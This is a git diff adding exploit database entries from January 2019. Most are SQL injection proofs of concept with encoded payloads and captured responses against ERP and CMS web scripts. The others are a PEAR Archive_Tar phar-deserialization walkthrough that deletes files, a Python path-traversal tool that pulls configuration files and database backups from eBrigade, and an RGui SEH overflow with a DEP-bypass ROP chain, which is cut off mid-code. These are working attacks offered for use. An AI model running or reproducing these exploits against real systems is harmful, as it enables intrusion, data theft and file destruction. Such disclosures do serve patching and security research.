diff --git a/exploits/multiple/webapps/46118.txt b/exploits/multiple/webapps/46118.txt new file mode 100644 index 000000000..0f85ebb28 --- /dev/null +++ b/exploits/multiple/webapps/46118.txt @@ -0,0 +1,31 @@ +#Exploit Title: OpenSource ERP SQL Injection +#Date: 10.01.2019 +#Exploit Author: Emre ÖVÜNÇ +#Vendor Homepage: http://www.nelson-it.ch +#Software Link: http://sourceforge.net/projects/opensourceerp/files/Windows/erp_6.3.1.exe/download +#Version: v6.3.1 +#Tested on: Windows + +# CVE-2019-5893 +https://github.com/EmreOvunc/OpenSource-ERP-SQL-Injection +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5893 +https://www.emreovunc.com/blog/en/OpenERP-SQL-DBversion.png + +# PoC + +POST /db/utils/query/data.xml HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 +Accept: */* +Content-Type: application/x-www-form-urlencoded;charset=UTF-8 +Origin: http://172.16.118.142:8024 +Referer: http://172.16.118.142:8024/ +Cache-Control: no-cache +Accept-Language: en-us,en;q=0.5 +Cookie: MneHttpSessionId8024=15471285865828 +Host: 172.16.118.142:8024 +Content-Length: 414 +Accept-Encoding: gzip, deflate +Connection: close + +sqlend=1&query=%27%7c%7ccast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7c(SELECT+VERSION())%7c%7cchr(95)%7c%7cchr(33)%7c%7cchr(64))+as+numeric)%7c%7c%27&schema=mne_application&table=userpref&cols=startweblet%2cregion%2cmslanguage%2cusername%2cloginname%2cpersonid%2clanguage%2cregionselect%2ctimezone%2ccountrycarcode%2cstylename%2cusername%2cstartwebletname&usernameInput.old=session_user&mneuserloginname=test \ No newline at end of file diff --git a/exploits/php/webapps/46108.txt b/exploits/php/webapps/46108.txt new file mode 100644 index 000000000..743e6d522 --- /dev/null +++ b/exploits/php/webapps/46108.txt @@ -0,0 +1,81 @@ +PEAR Archive_Tar < 1.4.4 - PHP Object Injection + +Date: + January 10, 2019 + +Author: + farisv + +Vendor Homepage: + https://pear.php.net/package/Archive_Tar/ + +Vulnerable Package Link: + http://download.pear.php.net/package/Archive_Tar-1.4.3.tgz + +CVE: + CVE-2018-1000888 + +In PEAR Archive_Tar before 1.4.4, there are several file operation with `$v_header['filename']` as parameter (such as file_exists, is_file, is_dir, etc). When extract() is called without a specific prefix path, we can trigger phar induced unserialization by crafting a tar file with `phar://[path_to_malicious_phar_file]` as path name. Object injection can be used to trigger destructor/wakeup method in the loaded PHP classes, e.g. the Archive_Tar class itself. With Archive_Tar itself, we can trigger arbitrary file deletion because `@unlink($this->_temp_tarname)` will be called in the destructor method. If another class with useful gadget is loaded, remote code execution may be possible. + + +Steps to reproduce object injection and arbitrary file deletion: + +1. Make sure that PHP & PEAR are installed. +2. Download vulnerable PEAR Archive_Tar. + +$ wget http://download.pear.php.net/package/Archive_Tar-1.4.3.tgz +$ tar xfz Archive_Tar-1.4.3.tgz +$ cd Archive_Tar-1.4.3 + +3. Create vulnerable code (vulnerable.php). + +``` +extract(); +``` + +4. Create dummy file /tmp/test. + +$ touch /tmp/test + +5. Genereate exploit.phar with the following PHP code and place the exploit.phar in the same directory with vulnerable.php. + +``` +startBuffering(); +$phar->addFromString('test.txt', 'text'); +$phar->setStub(''); + +$object = new Archive_Tar; +$object->_temp_tarname = '/tmp/test'; +$phar->setMetadata($object); +$phar->stopBuffering(); +``` + +6. Create exploit.tar with the following Python code. + +``` +import tarfile + +tf = tarfile.open('exploit.tar', 'w') + +tf.add('/dev/null', 'phar://exploit.phar') +tf.close() +``` + +7. Execute vulnerable.php to trigger object injection to delete /tmp/test. + +$ ls -alt /tmp/test +-rw-rw-r-- 1 vagrant vagrant 0 Jan 9 16:41 /tmp/test +$ php vulnerable.php +$ ls -alt /tmp/test +ls: cannot access '/tmp/test': No such file or directory \ No newline at end of file diff --git a/exploits/php/webapps/46109.py b/exploits/php/webapps/46109.py new file mode 100755 index 000000000..99b1cb0b1 --- /dev/null +++ b/exploits/php/webapps/46109.py @@ -0,0 +1,123 @@ +#!/usr/bin/python + +import mechanize, sys, cookielib, requests +import colorama, urllib, re, random, urllib2 +import wget +from colorama import Fore +from tqdm import tqdm +from pathlib import Path + +def bannerche(): + print ''' + @-------------------------------------------------------------@ + | eBrigade ERP <= 4.5 - Database Backup Disclosure via AFD | + | Vulnerability discovered by AkkuS | + | My Blog - https://pentest.com.tr | + @-------------------------------------------------------------@ + ''' +bannerche() + +if (len(sys.argv) != 2): + print "[*] Usage: poc.py " + exit(0) + +rhost = sys.argv[1] +UserName = str(raw_input("Identifiant: ")) # Administrator/User Username Input +Password = str(raw_input("Password: ")) # Administrator/User Password Input + +print(Fore.BLUE + "+ [*] Getting login permission...") +br = mechanize.Browser() # set cookies +br.set_handle_robots(False) +cj = cookielib.LWPCookieJar() +br.set_cookiejar(cj) + +br.open("http://"+rhost+"/") # User Access Login +assert br.viewing_html() +br.select_form(nr=0) +br.form['id'] = UserName +br.form['pwd'] = Password +br.submit() + +## +# Login Access and Version Control +## + +LoginControl = requests.get("http://"+rhost+"/index_d.php", cookies=cj) +HTMLdata = LoginControl.text + +finder = re.findall(r'version 4.5', HTMLdata) +try: + version = finder[0].replace('"','').replace('','').strip() +except IndexError: + pass +try: + if version == "version 4.5": + print (Fore.GREEN + "+ [*] Login successful") +except NameError: + pass + print (Fore.RED + "+ [*] User information is incorrect or version incompatible") +## +# Introducing Cookie and CSRF token information +## + +print (Fore.BLUE + "+ [*] Select Exploit Type:") +print (Fore.YELLOW +"- [*] 1 - Arbitrary File Download/Read (Ex: /conf/sql.php)") +print ("- [*] 2 - Database Backup File Download") +choice = int(raw_input("- [*] Enter a number (1 or 2) : ")) + +if choice == 1: + print (Fore.BLUE + "+ [*] Select the file you want to Download/Read:") + print (Fore.YELLOW + "- [*] 1 - /conf/sql.php") + print ("- [*] 2 - /config.php") + print ("- [*] 3 - /.htaccess.template") + print ("- [*] 4 - Manual exploitation") + AFDc = int(raw_input("- [*] Enter a number : ")) + if AFDc == 1: + AFD1 = requests.get("http://"+rhost+"/showfile.php?section=0&pompier=1&file=../../../conf/sql.php", cookies=cj) + print AFD1.text + elif AFDc == 2: + AFD2 = requests.get("http://"+rhost+"/showfile.php?section=0&pompier=1&file=../../../config.php", cookies=cj) + print AFD2.text + elif AFDc == 3: + AFD3 = requests.get("http://"+rhost+"/showfile.php?section=0&pompier=1&file=../../../.htaccess.template", cookies=cj) + print AFD3.text + elif AFDc == 4: + print (Fore.RED +"- [!] You must have knowledge of files and directories") + AFDmc = str(raw_input(Fore.BLUE + "+ [*] Enter file name (Ex: /lib/PHPMailer/class.smtp.php) : ")) + AFD4 = requests.get("http://"+rhost+"/showfile.php?section=0&pompier=1&file=../../.."+AFDmc+"", cookies=cj) + if AFD4.status_code == 200: + try: + mdata = AFD4.text + Le = re.findall(r'javascript:history.back', mdata) + LeClean = Le[0].replace('"','').strip() + if LeClean == "javascript:history.back": + print (Fore.RED + "+ [X] The directory and file name you entered could not be found or incorrect") + except IndexError: + pass + print AFD4.text + else: + print (Fore.RED + "+ [X] Unable to access file") + sys.exit() + else: + print("Invalid input!") + +elif choice == 2: + + backupfiles = requests.get("http://"+rhost+"/restore.php?file=", cookies=cj) + RecentesData = backupfiles.text + finder = re.findall(r'a href=".*"', RecentesData) + names = finder[0].replace('"','').replace('javascript:deletefile','').replace('a href=javascript:restore','').replace('save','').replace("'",'').replace('(','').replace(')','').replace(',','').strip() + print ("+ [*] Backup File Name : " + names) + + DB = requests.get("http://"+rhost+"/showfile.php?section=0&pompier=1&file=../../../user-data/save/"+names+"", cookies=cj) + + with open(names, "wb") as handle: + for data in tqdm(DB.iter_content()): + handle.write(data) + + p = str(Path.cwd()) + print(Fore.GREEN + "+ [*] Backup successfully downloaded. Directory path : " + p + "/" + names) +else: + print("Invalid input!") + +# end \ No newline at end of file diff --git a/exploits/php/webapps/46110.txt b/exploits/php/webapps/46110.txt new file mode 100644 index 000000000..96cc36d39 --- /dev/null +++ b/exploits/php/webapps/46110.txt @@ -0,0 +1,48 @@ +# Exploit Title: Matrix MLM Script 1.0 - Information Leakage +# Dork: N/A +# Date: 2019-01-10 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://royallifefoundation.org/ +# Software Link: https://codecanyon.net/item/mlmpro-multistage-forced-matrix-mlm-script/23050292 +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/modules/getdata.php +# +# userid= +# username= +# profileid= +# passport= +# currentstage= +# l_member= +# r_member= +# firstname= +# lastname= +# emailaddress= +# parentid=1 + +GET /[PATH]/modules/getdata.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=e1js8vek57sgge2oso51do2255 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 +HTTP/1.1 200 OK +Date: Wed, 09 Jan 2019 18:24:01 GMT +Server: Apache +X-Powered-By: PHP/5.6.39 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Vary: Accept-Encoding,User-Agent +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked \ No newline at end of file diff --git a/exploits/php/webapps/46111.txt b/exploits/php/webapps/46111.txt new file mode 100644 index 000000000..0e53c5e5a --- /dev/null +++ b/exploits/php/webapps/46111.txt @@ -0,0 +1,36 @@ +# Exploit Title: doitX 1.0 - SQL Injection +# Dork: N/A +# Date: 2019-01-10 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://mybizcms.com/ +# Software Link: https://codecanyon.net/item/doitx/23041037 +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/searchs?search=[SQL]&search_from=entries +# + +POST /[PATH]/searchs?search=%45%66%65%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31,%76%65%72%73%69%6f%6e%28%29,%33%2c%34%2c%35,%36%2c%37%2c%38%2c%39%2c%31%30,%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35,%31%36%2c%31%37%2d%2d%20%2d&search_from=entries HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate, br +Cookie: PHPSESSID=0d8ccf7db10abc97c8d3c41fa705cbbc +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Wed, 09 Jan 2019 19:19:05 GMT +Server: Apache +X-Powered-By: PHP/7.2.13 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Vary: Accept-Encoding +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked \ No newline at end of file diff --git a/exploits/php/webapps/46112.txt b/exploits/php/webapps/46112.txt new file mode 100644 index 000000000..4765a67d1 --- /dev/null +++ b/exploits/php/webapps/46112.txt @@ -0,0 +1,39 @@ +# Exploit Title: SHIELD - Freelancer Content Management System 2.2 - SQL Injection / CSRF +# Dork: N/A +# Date: 2019-01-10 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://ezcode.pt/ +# Software Link: https://codecanyon.net/item/shield-content-management-system/18833498 +# Version: 2.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# http://localhost/[PATH]/shield/forgot.php +# + +POST /[PATH]/shield/forgot.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 749 +Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2; EU_COOKIE_LAW_CONSENT=true +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +_csrf=0089a3c48ac05616e608ef7e74c98411&email=%27%7c%7c%28%53%45%4c%45%43%54%20%27%62%5a%74%57%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45%20%31%31%3d%31%31%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%3d%31%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&submit=Reset%2BPassword: undefined +HTTP/1.1 200 OK +Date: Wed, 09 Jan 2019 23:34:20 GMT +Server: Apache +X-Powered-By: PHP/5.5.38 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=utf-8 \ No newline at end of file diff --git a/exploits/php/webapps/46113.txt b/exploits/php/webapps/46113.txt new file mode 100644 index 000000000..c1b486b33 --- /dev/null +++ b/exploits/php/webapps/46113.txt @@ -0,0 +1,40 @@ +# Exploit Title: Architectural Cms 1.0 - SQL Injection +# Dork: N/A +# Date: 2019-01-10 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://ezcode.pt/ +# Software Link: https://codecanyon.net/item/architectural-multipage-theme-admin-panel/20968597 +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + + +# POC: +# http://localhost/[PATH]/backoffice/forgot.php +# + +POST /[PATH]/backoffice/forgot.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 749 +Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2; EU_COOKIE_LAW_CONSENT=true +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +_csrf=0089a3c48ac05616e608ef7e74c98411&email=%27%7c%7c%28%53%45%4c%45%43%54%20%27%62%5a%74%57%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45%20%31%31%3d%31%31%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%3d%31%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&submit=Reset%2BPassword: undefined +HTTP/1.1 200 OK +Date: Wed, 09 Jan 2019 22:53:02 GMT +Server: Apache +X-Powered-By: PHP/5.5.38 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=utf-8 \ No newline at end of file diff --git a/exploits/php/webapps/46114.txt b/exploits/php/webapps/46114.txt new file mode 100644 index 000000000..2c92c5c22 --- /dev/null +++ b/exploits/php/webapps/46114.txt @@ -0,0 +1,44 @@ +# Exploit Title: Matrix MLM Script 1.0 - SQL Injection +# Dork: N/A +# Date: 2019-01-10 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://royallifefoundation.org/ +# Software Link: https://codecanyon.net/item/mlmpro-multistage-forced-matrix-mlm-script/23050292 +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/login.php?section=login +# http://localhost/[PATH]/modules/deleteadmin.php?id=[SQL] +# http://localhost/[PATH]/modules/deletepin.php?id=[SQL] +# http://localhost/[PATH]/modules/activateadmin.php?id=[SQL] +# http://localhost/[PATH]/?section=read&mailid=[SQL] +# + +POST /[PATH]/login.php?section=login HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 538 +Cookie: PHPSESSID=e1js8vek57sgge2oso51do2255 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +username=%2d%31%27%20%55%4eI%4f%4e%20%2f%2a%21%31%31%31%31%31%53EL%45%43%54%2a%2f%20%31%2c%32%2c%33%2c%34%2c%35%2c%36,%43%4f%4e%43%41%54%28%55%53%45%52%28%29%2c%30%78%32%64%2c%56%45%52%53%49%4f%4e%28%29%29%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36,%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2d%2d%20%2d&password=&submit=Login: undefined +HTTP/1.1 302 Moved Temporarily +Date: Wed, 09 Jan 2019 17:09:32 GMT +Server: Apache +X-Powered-By: PHP/5.6.39 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Location: /index.php +Vary: Accept-Encoding,User-Agent +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked \ No newline at end of file diff --git a/exploits/php/webapps/46115.txt b/exploits/php/webapps/46115.txt new file mode 100644 index 000000000..2106611fd --- /dev/null +++ b/exploits/php/webapps/46115.txt @@ -0,0 +1,38 @@ +# Exploit Title: Event Calendar 3.7.4 - SQL Injection +# Dork: N/A +# Date: 2019-01-10 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://ezcode.pt/ +# Software Link: https://codecanyon.net/item/event-calendar-phpmysql-plugin/19246267 +# Version: 3.7.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/events_edit.php?id=[SQL] +# + +GET /[PATH]/events_edit.php?id=%2d%31%30%33%31%27%20%2f%2a%21%31%31%31%311%55%4e%49%4f%4e%20%2a%2f%2f%2a!11111SELE%43%54%2a%2f%20%31%2c%32%2c%33%2c%76%65%72%73%69%6f%6e%28%29%2c%35%2c%36%2c%37,8--%20- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2; EU_COOKIE_LAW_CONSENT=true +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Wed, 09 Jan 2019 23:31:12 GMT +Server: Apache +X-Powered-By: PHP/5.5.38 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Upgrade: h2,h2c +Connection: Upgrade, Keep-Alive +Keep-Alive: timeout=5, max=100 +Transfer-Encoding: chunked +Content-Type: text/html; charset=utf-8 \ No newline at end of file diff --git a/exploits/php/webapps/46116.txt b/exploits/php/webapps/46116.txt new file mode 100644 index 000000000..77b0c7494 --- /dev/null +++ b/exploits/php/webapps/46116.txt @@ -0,0 +1,38 @@ +# Exploit Title: Event Locations 1.0.1 - SQL Injection +# Dork: N/A +# Date: 2019-01-10 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://ezcode.pt/ +# Software Link: https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679 +# Version: 1.0.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/events_edit.php?id=[SQL] +# + +GET /[PATH]/events_edit.php?id=%2d%32%33%36%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31111%31%53%45%4c%45%43%54%2a%2f%20%31%2c%32%2c%33%2c%76%65%72%73%69%6f%6e%28%29%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2; EU_COOKIE_LAW_CONSENT=true +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Wed, 09 Jan 2019 22:28:38 GMT +Server: Apache +X-Powered-By: PHP/5.5.38 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Upgrade: h2,h2c +Connection: Upgrade, Keep-Alive +Keep-Alive: timeout=5, max=100 +Transfer-Encoding: chunked +Content-Type: text/html; charset=utf-8 \ No newline at end of file diff --git a/exploits/php/webapps/46117.txt b/exploits/php/webapps/46117.txt new file mode 100644 index 000000000..7ea9ea300 --- /dev/null +++ b/exploits/php/webapps/46117.txt @@ -0,0 +1,52 @@ +# Exploit Title: eBrigade ERP 4.5 - SQL Injection +# Dork: N/A +# Date: 2019-01-10 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://ebrigade.net/ +# Software Link: https://netcologne.dl.sourceforge.net/project/ebrigade/ebrigade/eBrigade%204.5/ebrigade_4.5.zip +# Version: 4.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/pdf.php?pdf=DPS&id=[SQL] +# + +#/[PATH]/pdf.php + +#30 $id=$_SESSION['id']; +#31 +#32 $badges = ""; $devis = ""; +#33 +#34 $page =(isset($_GET['page'])?intval($_GET['page']):0); +#35 +#36 $doc = (isset($_POST['pdf'])?secure_input($dbc,$_POST['pdf']):(isset($_GET['pdf'])?secure_input($dbc,$_GET['pdf']):"")); +#37 +#38 $devis = explode(",",(isset($_POST['id'])?secure_input($dbc,$_POST['id']):(isset($_GET['id'])?secure_input($dbc,$_GET['id']):""))); +#39 +#40 $badges = explode(",",(isset($_POST['SelectionMail'])?secure_input($dbc,$_POST['SelectionMail']):(isset($_GET['SelectionMail'])?secure_input($dbc,$_GET['SelectionMail']):""))); +#41 + +GET /[PATH]/pdf.php?pdf=DPS&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4fM%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4fNCA%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43AT(C%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52OM+%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4cES+W%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54+%30%2c%31%29,%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4cES+GR%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=qsaq65v2oalshif28tmsd7c261 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Thu, 10 Jan 2019 19:14:28 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Pragma: no-cache +Content-Length: 875 +Keep-Alive: timeout=5, max=60 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows/local/46107.py b/exploits/windows/local/46107.py new file mode 100755 index 000000000..c36668049 --- /dev/null +++ b/exploits/windows/local/46107.py @@ -0,0 +1,111 @@ +#!/usr/bin/python + +# +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Exploit Title: RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass) +# Date: 01-09-2018 +# Vulnerable Software: RGui 3.5.0 +# Vendor Homepage: https://www.r-project.org/ +# Version: 3.5.0 +# Software Link: https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe +# Tested On: Windows 7 x86 +# +# lots of bad chars, use alpha_mixed +# badchars \x00\x0a\x0d\x0e and \x80 through \xbf +# +# this was fixed in 3.5.1; +# +# PoC: +# 1. generate rgui350dep.txt, copy contents to clipboard +# 2. open app, select Edit, select 'GUI preferences' +# 3. paste rgui350dep.txt contents into 'Language for menus and messages' +# 4. select OK +# 5. pop calc +# + +import struct +filename="rgui350dep.txt" + +junk = "A"*904 + +#{pivot 2556 / 0x9fc} +# ADD ESP,9EC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Rgraphapp.dll] +seh = struct.pack(' put 0x00001000 into edx) + 0x6c92e13a, # ADD EAX,5B18C483 # RETN [R.dll] + 0x6c9f4bca, # XCHG EAX,EDX # RETN [R.dll] + 0x713811b8, # POP ECX # RETN [stats.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x7136d670, # NEG ECX # RETN [stats.dll] + 0x6cb2601a, # POP EDI # RETN [R.dll] + 0x6375fe5c, # RETN (ROP NOP) [Rgraphapp.dll] + 0x63976123, # POP EAX # RETN [graphics.dll] + 0x90909090, # nop + 0x6ff24de3, # PUSHAD # RETN [grDevices.dll] + ] + return ''.join(struct.pack('